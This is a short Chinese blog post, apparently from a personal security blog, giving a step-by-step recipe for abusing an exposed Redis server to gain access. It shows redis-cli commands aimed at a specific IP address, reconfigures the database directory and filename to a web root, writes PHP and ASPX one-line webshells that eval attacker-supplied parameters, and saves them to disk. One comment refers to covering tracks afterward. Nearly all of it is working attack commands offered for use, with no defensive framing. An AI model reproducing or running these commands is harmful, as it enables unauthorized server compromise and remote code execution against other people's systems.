当前位置:首页 > 文章 > 正文内容

redis渗透获取权限

admin2024-01-24文章1455

KALI

redis-cli -h 189.174.86.173

//运行并复制相关参数,完事了搽屁股

config get dir 

config get dbfilename

//开始 设置网站目录 文件名 内容

config set dir E:/www/font

config set dbfilename redis.aspx

set webshell "<?php phpinfo(); ?>" 

 //php查看信息

set webshell "<?php @eval($_POST['chopper']);?> " 

 //phpwebshell

set webshell "<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"c\"],\"unsafe\");%>"

// aspx的webshell,注意双引号使用\"

————————————————

save

//查看一下成功没

get webshell



扫描二维码推送至手机访问。

版权声明:本文由Mpg blog发布,如需转载请注明出处。

分享给朋友:

相关文章

kali安装中文输入法,三条完事

一、使用命令 apt-get install fcitx 安装输入法框架二、使用命令 apt-get install fcitx-googlepinyin  安装谷歌输入法三、使用命令 re...

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现

ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。实验环境靶机:Thi...

智能DIY官网程序远程附件修复

1.0.73问题:多用户不能独立设置远程附件配置。修改文件lf_bddiy/core/modules/admin/models/core_setting/AttachmentConfigModel.p...

2024龙年艺术字源文件,整整60套设计龙年素材

2024龙年艺术字源文件,整整60套设计龙年素材

下载地址:https://pan.baidu.com/s/1L3Fqo-YC1pc-Oo-lqLa4zQ?pwd=v996...

最近爱上看短剧了,发现一个免费的短剧网站!

最近爱上看短剧了,发现一个免费的短剧网站!

短剧全免费,没有广告,不付费,贼爽给你们更新部分网络短剧的名称,如果找不到,还可以自己去搜索“免费短剧”https://www.r100.cc《炎帝》(88集)《爱回家》(65集)《让你穿越不是让你娶...

发表评论

访客

看不清,换一张

◎欢迎参与讨论,请在这里发表您的看法和观点。